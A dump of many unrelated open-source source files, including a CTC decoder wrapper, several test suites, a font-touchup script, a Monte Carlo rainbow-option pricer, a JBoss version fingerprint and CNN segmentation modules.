raise ImportError(CTCDECODE_IMPORT_ERROR)
assert isinstance(labels, list), "labels must instance of list"
self.decoder = CTCBeamDecoder(labels, lm_path, alpha, beta, cutoff_top_n,
cutoff_prob, beam_size, num_processes, blank_id)
def forward(self, logits, sizes=None):
r"""
Decodes probability output using ctcdecode package.
Inputs: logits, sizes
logits: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t
sizes: Size of each sequence in the mini-batch
Returns:
outputs: sequences of the model's best prediction
"""
logits = logits.cpu()
outputs, scores, offsets, seq_lens = self.decoder.decode(logits, sizes)
return outputs
|
spinoffs/inference_gym/inference_gym/targets/eight_schools_test.py | PavanKishore21/probability | 3,670 | 30679 | # Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for inference_gym.targets.eight_schools."""
import tensorflow.compat.v2 as tf
from inference_gym.internal import test_util
from inference_gym.targets import eight_schools
@test_util.multi_backend_test(globals(), 'targets.eight_schools_test')
class EightSchoolsTest(test_util.InferenceGymTestCase):
def testEightSchools(self):
"""Checks that unconstrained parameters yield finite joint densities."""
model = eight_schools.EightSchools()
self.validate_log_prob_and_transforms(
model,
sample_transformation_shapes=dict(identity={
'avg_effect': [],
'log_stddev': [],
'school_effects': [8],
}),
check_ground_truth_mean_standard_error=True,
check_ground_truth_mean=True,
check_ground_truth_standard_deviation=True)
@test_util.numpy_disable_gradient_test
def testEightSchoolsHMC(self):
"""Checks approximate samples from the model against the ground truth."""
model = eight_schools.EightSchools()
self.validate_ground_truth_using_hmc(
model,
num_chains=4,
num_steps=4000,
num_leapfrog_steps=10,
step_size=0.4,
)
if __name__ == '__main__':
tf.test.main()
|
pylayers/antprop/examples/ex_meta.py | usmanwardag/pylayers | 143 | 30696 | from pylayers.gis.layout import *
from pylayers.antprop.signature import *
from pylayers.antprop.channel import *
import pylayers.signal.waveform as wvf
import networkx as nx
import numpy as np
import time
import logging
L = Layout('WHERE1_clean.ini')
#L = Layout('defstr2.ini')
try:
L.dumpr()
except:
L.build()
L.dumpw()
#L.build()
#L.dumpw()
#L.buildGi()
nc1 = 6#5
nc2 = 25#37
poly1 = L.Gt.node[nc1]['polyg']
cp1 = poly1.centroid.xy
poly2 = L.Gt.node[nc2]['polyg']
cp2 = poly2.centroid.xy
ptx = np.array([cp1[0][0],cp1[1][0],1.5])
prx = np.array([cp2[0][0]+0.5,cp2[1][0]+0.5,1.5])
print ptx
print prx
d = np.sqrt(np.dot((ptx-prx),(ptx-prx)))
tau = d/0.3
print d,tau
logging.info('Signature')
S = Signatures(L,nc1,nc2)
a =time.time()
logging.info('Calculate signature')
#S.run2(cutoff=6,dcut=3)
S.run(cutoff=2)
b=time.time()
print b-a
for i in L.Gi.nodes():
ei = eval(i)
if type(ei)!= int:
if ei[0] == 354:
print i
#Gsi.add_node('Tx')
#Gsi.pos['Tx']=tuple(ptx[:2])
#for i in L.Gt.node[nc1]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge('Tx',i)
#Gsi.add_node('Rx')
#Gsi.pos['Rx']=tuple(prx[:2])
#for i in L.Gt.node[nc2]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge(i,'Rx')
#print 'signatures'
#co = nx.dijkstra_path_length(Gsi,'Tx','Rx')
#sig=list(nx.all_simple_paths(Gsi,'Tx','Rx',cutoff=co+2))
#b=time.time()
#print b-a
#f,ax=L.showG('t')
#nx.draw(Gsi,Gsi.pos,ax=ax)
#plt.show()
##S.run(L,metasig,cutoff=3)
#print "r = S.rays "
r = S.rays(ptx,prx)
print "r3 = r.to3D "
r3 = r.to3D()
print "r3.locbas "
r3.locbas(L)
#print "r3.fillinter "
r3.fillinter(L)
r3.show(L)
plt.show()
##
#config = ConfigParser.ConfigParser()
#_filesimul = 'default.ini'
#filesimul = pyu.getlong(_filesimul, "ini")
#config.read(filesimul)
#fGHz = np.linspace(eval(config.get("frequency", "fghzmin")),
# eval(config.get("frequency", "fghzmax")),
# eval(config.get("frequency", "nf")))
#
#Cn=r3.eval(fGHz)
#
#Cn.freq=Cn.fGHz
#sco=Cn.prop2tran(a='theta',b='theta')
#wav = wvf.Waveform()
#ciro = sco.applywavB(wav.sfg)
#
##raynumber = 4
#
##fig=plt.figure('Cpp')
##f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
#
##r3d.info(raynumber)
## plt.show()
##
##
##
###
###c11 = r3d.Ctilde[:,:,0,0]
###c12 = r3d.Ctilde[:,:,0,1]
###c21 = r3d.Ctilde[:,:,1,0]
###c22 = r3d.Ctilde[:,:,1,1]
###
###
###
###Cn=Ctilde()
###Cn.Cpp = bs.FUsignal(r3d.I.f, c11)
###Cn.Ctp = bs.FUsignal(r3d.I.f, c12)
###Cn.Cpt = bs.FUsignal(r3d.I.f, c21)
###Cn.Ctt = bs.FUsignal(r3d.I.f, c22)
###Cn.nfreq = r3d.I.nf
###Cn.nray = r3d.nray
###Cn.tauk=r3d.delays
###
###raynumber = 4
###
###fig=plt.figure('Cpp')
###f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
###
##
##
##
##
##
##
|
package/awesome_panel/application/services/message_service.py | Jhsmit/awesome-panel | 179 | 30712 | """This module implements the MessageService
The MessageService enables sending and receiving messages
"""
import param
class MessageService(param.Parameterized):
"""The MessageService enables sending and receiving messages"""
|
herokuapp/project_template/manage.py | urkonn/django-herokuapp | 262 | 30714 | <filename>herokuapp/project_template/manage.py
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
# Load the Heroku environment.
from herokuapp.env import load_env
load_env(__file__, "{{ app_name }}")
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "{{ project_name }}.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
scripts/touchup_for_web.py | BennZoll/roboto | 3,933 | 30719 | <reponame>BennZoll/roboto<gh_stars>1000+
#!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Post-build web fonts changes for Roboto."""
import sys
from fontTools import ttLib
from nototools import font_data
import temporary_touchups
def apply_web_specific_fixes(font, unhinted, family_name):
"""Apply fixes needed for web fonts."""
# set vertical metrics to old values
hhea = font['hhea']
hhea.ascent = 1900
hhea.descent = -500
os2 = font['OS/2']
os2.sTypoAscender = 1536
os2.sTypoDescender = -512
os2.sTypoLineGap = 102
os2.usWinAscent = 1946
os2.usWinDescent = 512
# correct anything else needed for both web and Chrome OS
apply_web_cros_common_fixes(font, unhinted, family_name)
def apply_web_cros_common_fixes(font, unhinted, family_name):
"""Apply fixes needed for web and CrOS targets"""
subfamily_name = font_data.get_name_records(font)[2].encode('ASCII')
assert(subfamily_name in
['Thin', 'Thin Italic',
'Light', 'Light Italic',
'Regular', 'Italic',
'Medium', 'Medium Italic',
'Bold', 'Bold Italic',
'Black', 'Black Italic'])
if 'Condensed' in font_data.get_name_records(font)[1]:
family_name += ' Condensed'
full_name = family_name
if subfamily_name != 'Regular':
full_name += ' ' + subfamily_name
# Family, subfamily names
font_data.set_name_record(font, 16, family_name)
style_map = ['Regular', 'Bold', 'Italic', 'Bold Italic']
if subfamily_name in style_map:
font_data.set_name_record(font, 1, family_name)
else:
weight = subfamily_name.split()[0]
new_family_name = family_name
if weight != 'Regular':
new_family_name += ' ' + weight
font_data.set_name_record(font, 1, new_family_name)
# all weights outside regular and bold should only have subfamily
# "Regular" or "Italic"
italic = subfamily_name.endswith('Italic')
font_data.set_name_record(font, 2, style_map[italic << 1])
# Unique identifier and full name
font_data.set_name_record(font, 3, full_name)
font_data.set_name_record(font, 4, full_name)
font_data.set_name_record(font, 18, None)
# PostScript name
font_data.set_name_record(
font, 6, (family_name+'-'+subfamily_name).replace(' ', ''))
# Copyright message
font_data.set_name_record(
font, 0, 'Copyright 2011 Google Inc. All Rights Reserved.')
# hotpatch glyphs by swapping
# https://github.com/google/roboto/issues/18
glyf = font['glyf']
glyf['chi'], glyf['chi.alt'] = glyf['chi.alt'], glyf['chi']
# make glyph orders consistent for feature copying
# https://github.com/google/roboto/issues/71
glyph_order = font.getGlyphOrder()
for i, glyph_name in enumerate(glyph_order):
if glyph_name.endswith('.lnum'):
new_name = glyph_name.replace('.lnum', '.pnum')
glyph_order[i] = new_name
font['glyf'][new_name] = font['glyf'][glyph_name]
# append old name to glyph order so del succeeds
glyph_order.append(glyph_name)
del font['glyf'][glyph_name]
# copy features from unhinted
# https://github.com/google/roboto/pull/163
for table in ['GDEF', 'GPOS', 'GSUB']:
font[table] = unhinted[table]
def correct_font(source_name, unhinted_name, target_font_name, family_name):
"""Corrects metrics and other meta information."""
font = ttLib.TTFont(source_name)
unhinted = ttLib.TTFont(unhinted_name)
# apply web-specific fixes before shared, so that sub/family names are
# correct for black weights and their bold bits will be set
apply_web_specific_fixes(font, unhinted, family_name)
temporary_touchups.apply_temporary_fixes(font, is_for_web=True)
temporary_touchups.update_version_and_revision(font)
font.save(target_font_name)
def main(argv):
"""Correct the font specified in the command line."""
correct_font(*argv[1:])
if __name__ == "__main__":
main(sys.argv)
|
tests/test_losses_config.py | blazejdolicki/vissl | 2,512 | 30729 | <reponame>blazejdolicki/vissl
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import unittest
from collections import namedtuple
from classy_vision.generic.distributed_util import set_cpu_device
from parameterized import parameterized
from utils import ROOT_LOSS_CONFIGS, SSLHydraConfig
from vissl.trainer.train_task import SelfSupervisionTask
from vissl.utils.hydra_config import convert_to_attrdict
logger = logging.getLogger("__name__")
set_cpu_device()
BATCH_SIZE = 2048
EMBEDDING_DIM = 128
NUM_CROPS = 2
BUFFER_PARAMS_STRUCT = namedtuple(
"BUFFER_PARAMS_STRUCT", ["effective_batch_size", "world_size", "embedding_dim"]
)
BUFFER_PARAMS = BUFFER_PARAMS_STRUCT(BATCH_SIZE, 1, EMBEDDING_DIM)
class TestRootConfigsLossesBuild(unittest.TestCase):
@parameterized.expand(ROOT_LOSS_CONFIGS)
def test_loss_build(self, filepath):
logger.info(f"Loading {filepath}")
cfg = SSLHydraConfig.from_configs(
[
filepath,
"config.DATA.TRAIN.DATA_SOURCES=[synthetic]",
"config.DATA.TEST.DATA_SOURCES=[synthetic]",
]
)
_, config = convert_to_attrdict(cfg.default_cfg)
task = SelfSupervisionTask.from_config(config)
task.datasets, _ = task.build_datasets()
self.assertTrue(task._build_loss(), "failed to build loss")
def test_pytorch_loss(self):
cfg = SSLHydraConfig.from_configs(
[
"config=test/integration_test/quick_simclr",
"config.LOSS.name=CosineEmbeddingLoss",
"+config.LOSS.CosineEmbeddingLoss.margin=1.0",
"config.DATA.TRAIN.DATA_SOURCES=[synthetic]",
"config.DATA.TEST.DATA_SOURCES=[synthetic]",
]
)
_, config = convert_to_attrdict(cfg.default_cfg)
task = SelfSupervisionTask.from_config(config)
task.datasets, _ = task.build_datasets()
self.assertTrue(task._build_loss(), "failed to build loss")
|
scale/source/apps.py | kaydoh/scale | 121 | 30747 | <gh_stars>100-1000
"""Defines the application configuration for the source application"""
from __future__ import unicode_literals
from django.apps import AppConfig
class SourceConfig(AppConfig):
"""Configuration for the source app
"""
name = 'source'
label = 'source'
verbose_name = 'Source'
def ready(self):
"""
Override this method in subclasses to run code when Django starts.
"""
# Register source file parse saver
from job.configuration.data.data_file import DATA_FILE_PARSE_SAVER
from source.configuration.source_data_file import SourceDataFileParseSaver
DATA_FILE_PARSE_SAVER['DATA_FILE_PARSE_SAVER'] = SourceDataFileParseSaver()
# Register source message types
from messaging.messages.factory import add_message_type
from source.messages.purge_source_file import PurgeSourceFile
add_message_type(PurgeSourceFile)
|
Chapter14/c14_11_rainbow_callMaxOn2_viaSimulation.py | John-ye666/Python-for-Finance-Second-Edition | 236 | 30759 | """
Name : c14_11_rainbow_callMaxOn2_viaSimulation.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : <NAME>
Date : 6/6/2017
email : <EMAIL>
<EMAIL>
"""
import scipy as sp
from scipy import zeros, sqrt, shape
#
sp.random.seed(123) # fix our random numbers
s1=100. # stock price 1
s2=95. # stock price 2
k=102.0 # exercise price
T=8./12. # maturity in years
r=0.08 # risk-free rate
rho=0.75 # correlation between 2
sigma1=0.15 # volatility for stock 1
sigma2=0.20 # volatility for stock 1
nSteps=100. # number of steps
nSimulation=1000 # number of simulations
#
# step 1: generate correlated random number
dt =T/nSteps
call = sp.zeros([nSimulation], dtype=float)
x = range(0, int(nSteps), 1)
#
# step 2: call call prices
for j in range(0, nSimulation):
x1=sp.random.normal(size=nSimulation)
x2=sp.random.normal(size=nSimulation)
y1=x1
y2=rho*x1+sp.sqrt(1-rho**2)*x2
sT1=s1
sT2=s2
for i in x[:-1]:
e1=y1[i]
e2=y2[i]
sT1*=sp.exp((r-0.5*sigma1**2)*dt+sigma1*e1*sqrt(dt))
sT2*=sp.exp((r-0.5*sigma2**2)*dt+sigma2*e2*sqrt(dt))
minOf2=min(sT1,sT2)
call[j]=max(minOf2-k,0)
#
# Step 3: summation and discount back
call=sp.mean(call)*sp.exp(-r*T)
print('Rainbow call on minimum of 2 assets = ', round(call,3))
|
maya/Tests/joint_test.py | ryu-sw/alembic | 921 | 30774 | <reponame>ryu-sw/alembic
##-*****************************************************************************
##
## Copyright (c) 2009-2011,
## <NAME> Imageworks, Inc. and
## Industrial Light & Magic, a division of Lucasfilm Entertainment Company Ltd.
##
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above
## copyright notice, this list of conditions and the following disclaimer
## in the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Sony Pictures Imageworks, nor
## Industrial Light & Magic nor the names of their contributors may be used
## to endorse or promote products derived from this software without specific
## prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
##-*****************************************************************************
from maya import cmds as MayaCmds
import maya.OpenMaya as OpenMaya
import os
import subprocess
import unittest
import util
def createJoints():
name = MayaCmds.joint(position=(0, 0, 0))
MayaCmds.rotate(33.694356, 4.000428, 61.426019, r=True, ws=True)
MayaCmds.joint(position=(0, 4, 0), orientation=(0.0, 45.0, 90.0))
MayaCmds.rotate(62.153171, 0.0, 0.0, r=True, os=True)
MayaCmds.joint(position=(0, 8, -1), orientation=(90.0, 0.0, 0.0))
MayaCmds.rotate(70.245162, -33.242019, 41.673097, r=True, os=True)
MayaCmds.joint(position=(0, 12, 3))
MayaCmds.rotate(0.0, 0.0, -58.973851, r=True, os=True)
return name
class JointTest(unittest.TestCase):
def setUp(self):
MayaCmds.file(new=True, force=True)
self.__files = []
self.__abcStitcher = [os.environ['AbcStitcher']]
def tearDown(self):
for f in self.__files:
os.remove(f)
def testStaticJointRW(self):
name = createJoints()
# write to file
self.__files.append(util.expandFileName('testStaticJoints.abc'))
MayaCmds.AbcExport(j='-root %s -file %s' % (name, self.__files[-1]))
MayaCmds.select(name)
MayaCmds.group(name='original')
# read from file
MayaCmds.AbcImport(self.__files[-1], mode='import')
# make sure the translate and rotation are the same
nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"]
nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"]
for i in range(0, 4):
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4)
def testStaticIKRW(self):
name = createJoints()
MayaCmds.ikHandle(sj=name, ee='joint4')
MayaCmds.move(-1.040057, -7.278225, 6.498725, r=True)
# write to file
self.__files.append(util.expandFileName('testStaticIK.abc'))
MayaCmds.AbcExport(j='-root %s -f %s' % (name, self.__files[-1]))
MayaCmds.select(name)
MayaCmds.group(name='original')
# read from file
MayaCmds.AbcImport(self.__files[-1], mode='import')
# make sure the translate and rotation are the same
nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"]
nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"]
for i in range(0, 4):
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4)
def testAnimIKRW(self):
name = createJoints()
handleName = MayaCmds.ikHandle(sj=name, ee='joint4')[0]
MayaCmds.currentTime(1, update=True)
MayaCmds.setKeyframe(handleName, breakdown=0, hierarchy='none', controlPoints=False, shape=False)
MayaCmds.currentTime(16, update=True)
MayaCmds.move(-1.040057, -7.278225, 6.498725, r=True)
MayaCmds.setKeyframe(handleName, breakdown=0, hierarchy='none', controlPoints=False, shape=False)
self.__files.append(util.expandFileName('testAnimIKRW.abc'))
self.__files.append(util.expandFileName('testAnimIKRW01_08.abc'))
self.__files.append(util.expandFileName('testAnimIKRW09-16.abc'))
# write to files
MayaCmds.AbcExport(j='-fr 1 8 -root %s -f %s' % (name, self.__files[-2]))
MayaCmds.AbcExport(j='-fr 9 16 -root %s -f %s' % (name, self.__files[-1]))
MayaCmds.select(name)
MayaCmds.group(name='original')
subprocess.call(self.__abcStitcher + self.__files[-3:])
# read from file
MayaCmds.AbcImport(self.__files[-3], mode='import')
# make sure the translate and rotation are the same
nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"]
nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"]
for t in range(1, 25):
MayaCmds.currentTime(t, update=True)
for i in range(0, 4):
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4)
|
tools/improve_8105.py | dophist/pinyin-data | 823 | 30788 | <reponame>dophist/pinyin-data
# -*- coding: utf-8 -*-
"""补充 8105 中汉字的拼音数据"""
from collections import namedtuple
import re
import sys
from pyquery import PyQuery
import requests
re_pinyin = re.compile(r'拼音:(?P<pinyin>\S+) ')
re_code = re.compile(r'统一码\w?:(?P<code>\S+) ')
re_alternate = re.compile(r'异体字:\s+?(?P<alternate>\S+)')
HanziInfo = namedtuple('HanziInfo', 'pinyin code alternate')
def fetch_html(url, params):
response = requests.get(url, params=params)
return response.content
def fetch_info(hanzi):
url = 'http://www.guoxuedashi.com/zidian/so.php'
params = {
'sokeyzi': hanzi,
'kz': 1,
'submit': '',
}
html = fetch_html(url, params)
pq = PyQuery(html)
pq = PyQuery(pq('table.zui td')[1])
text = pq('tr').text()
text_alternate = pq(html)('.info_txt2')('em').text()
pinyin = ''
pinyin_match = re_pinyin.search(text)
if pinyin_match is not None:
pinyin = pinyin_match.group('pinyin')
code = re_code.search(text).group('code')
alternate = ''
alternate_match = re_alternate.search(text_alternate)
if alternate_match is not None:
alternate = alternate_match.group('alternate')
return HanziInfo(pinyin, code, alternate)
def parse_hanzi(hanzi):
info = fetch_info(hanzi)
if (not info.pinyin) and info.alternate:
alternate = fetch_info(info.alternate)
else:
alternate = ''
return HanziInfo(info.pinyin, info.code, alternate)
def main(lines):
for line in lines:
if line.startswith('# U+') and '<-' in line:
# # U+xxx ... -> U+xxx
code = line.split(':')[0].strip('# ')
# U+xxx -> xxx
code = code[2:]
info = parse_hanzi(code)
pinyin = info.pinyin
extra = ''
if (not pinyin) and info.alternate:
alternate = info.alternate
pinyin = alternate.pinyin
extra = ' => U+{0}'.format(alternate.code)
if ',' in pinyin:
first_pinyin, extra_pinyin = pinyin.split(',', 1)
pinyin = first_pinyin
extra += ' ?-> ' + extra_pinyin
if pinyin:
line = line.strip()
# # U+xxx -> U+xxx
line = line[2:]
line = line.replace('<-', pinyin)
if extra:
line += extra
yield line.strip()
if __name__ == '__main__':
args = sys.argv[1:]
input_file = args[0]
with open(input_file) as fp:
for line in main(fp):
print(line)
|
api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | 126 | 30791 | from rest_framework import status
from rest_framework.exceptions import APIException
class FeatureStateVersionError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
class FeatureStateVersionAlreadyExistsError(FeatureStateVersionError):
status_code = status.HTTP_400_BAD_REQUEST
def __init__(self, version: int):
super(FeatureStateVersionAlreadyExistsError, self).__init__(
f"Version {version} already exists for FeatureState."
)
|
tests/__init__.py | RonenTRA/faster-than-requests | 857 | 30811 | # Allow tests/ directory to see faster_than_requests/ package on PYTHONPATH
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parent.parent))
|
html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | 14,668 | 30838 | <filename>html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py<gh_stars>1000+
import time
def main(request, response):
delay = float(request.GET.first(b"ms", 500))
time.sleep(delay / 1E3)
return [(b"Content-type", b"text/javascript")], u"export let delayedLoaded = true;"
|
src/platform/jboss/fingerprints/JBoss71Manage.py | 0x27/clusterd | 539 | 30884 | <filename>src/platform/jboss/fingerprints/JBoss71Manage.py
from src.platform.jboss.interfaces import JINTERFACES
from cprint import FingerPrint
class FPrint(FingerPrint):
def __init__(self):
self.platform = "jboss"
self.version = "7.1"
self.title = JINTERFACES.MM
self.uri = "/console/app/gwt/chrome/chrome_rtl.css"
self.port = 9990
self.hash = "14755bd918908c2703c57bd1a52046b6"
|
YNet/stage2/Model.py | cancertech/-cancer_diagnosis | 126 | 30896 | <gh_stars>100-1000
#
# author: <NAME>
# Project Description: This repository contains source code for semantically segmenting WSIs; however, it could be easily
# adapted for other domains such as natural image segmentation
# File Description: This file contains the CNN models
# ==============================================================================
import torch
import torch.nn as nn
class CBR(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
self.act = nn.ReLU(True)
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
output = self.act(output)
return output
class CB(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
return output
class C(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
def forward(self, input):
output = self.conv(input)
return output
class DownSampler(nn.Module):
def __init__(self, nIn, nOut):
super().__init__()
self.conv = nn.Conv2d(nIn, nOut - nIn, 3, stride=2, padding=1, bias=False)
self.pool = nn.AvgPool2d(3, stride=2, padding=1)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
def forward(self, input):
output = torch.cat([self.conv(input), self.pool(input)], 1)
output = self.bn(output)
output = self.act(output)
return output
class BasicResidualBlock(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
self.c1 = CBR(nIn, nOut, 3, 1)
self.c2 = CB(nOut, nOut, 3, 1)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output = self.c1(input)
output = self.c2(output)
output = input + output
# output = self.drop(output)
output = self.act(output)
return output
class DownSamplerA(nn.Module):
def __init__(self, nIn, nOut):
super().__init__()
self.conv = CBR(nIn, nOut, 3, 2)
def forward(self, input):
output = self.conv(input)
return output
class BR(nn.Module):
def __init__(self, nOut):
super().__init__()
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
def forward(self, input):
output = self.bn(input)
output = self.act(output)
return output
class CDilated(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1, d=1):
super().__init__()
padding = int((kSize - 1) / 2) * d
self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False,
dilation=d)
def forward(self, input):
output = self.conv(input)
return output
class CDilated1(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1, d=1):
super().__init__()
padding = int((kSize - 1) / 2) * d
self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False,
dilation=d)
self.br = BR(nOut)
def forward(self, input):
output = self.conv(input)
return self.br(output)
class DilatedParllelResidualBlockB(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
n = int(nOut / 5)
n1 = nOut - 4 * n
self.c1 = C(nIn, n, 1, 1)
self.d1 = CDilated(n, n1, 3, 1, 1)
self.d2 = CDilated(n, n, 3, 1, 2)
self.d4 = CDilated(n, n, 3, 1, 4)
self.d8 = CDilated(n, n, 3, 1, 8)
self.d16 = CDilated(n, n, 3, 1, 16)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output1 = self.c1(input)
d1 = self.d1(output1)
d2 = self.d2(output1)
d4 = self.d4(output1)
d8 = self.d8(output1)
d16 = self.d16(output1)
add1 = d2
add2 = add1 + d4
add3 = add2 + d8
add4 = add3 + d16
combine = torch.cat([d1, add1, add2, add3, add4], 1)
combine_in_out = input + combine
output = self.bn(combine_in_out)
# output = self.drop(output)
output = self.act(output)
return output
class DilatedParllelResidualBlockB1(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
n = int(nOut / 4)
n1 = nOut - 3 * n
self.c1 = C(nIn, n, 3, 1)
self.d1 = CDilated(n, n1, 3, 1, 1)
self.d2 = CDilated(n, n, 3, 1, 2)
self.d4 = CDilated(n, n, 3, 1, 4)
self.d8 = CDilated(n, n, 3, 1, 8)
self.d16 = CDilated(n, n, 3, 1, 16)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output1 = self.c1(input)
d1 = self.d1(output1)
d2 = self.d2(output1)
d4 = self.d4(output1)
d8 = self.d8(output1)
# d16 = self.d16(output1)
add1 = d2
add2 = add1 + d4
add3 = add2 + d8
# add4 = add3 + d16
combine = torch.cat([d1, add1, add2, add3], 1)
combine_in_out = input + combine
output = self.bn(combine_in_out)
# output = self.drop(output)
output = self.act(output)
return output
class PSPDec(nn.Module):
def __init__(self, nIn, nOut, downSize, upSize=48):
super().__init__()
self.features = nn.Sequential(
nn.AdaptiveAvgPool2d(downSize),
nn.Conv2d(nIn, nOut, 1, bias=False),
nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(nOut),
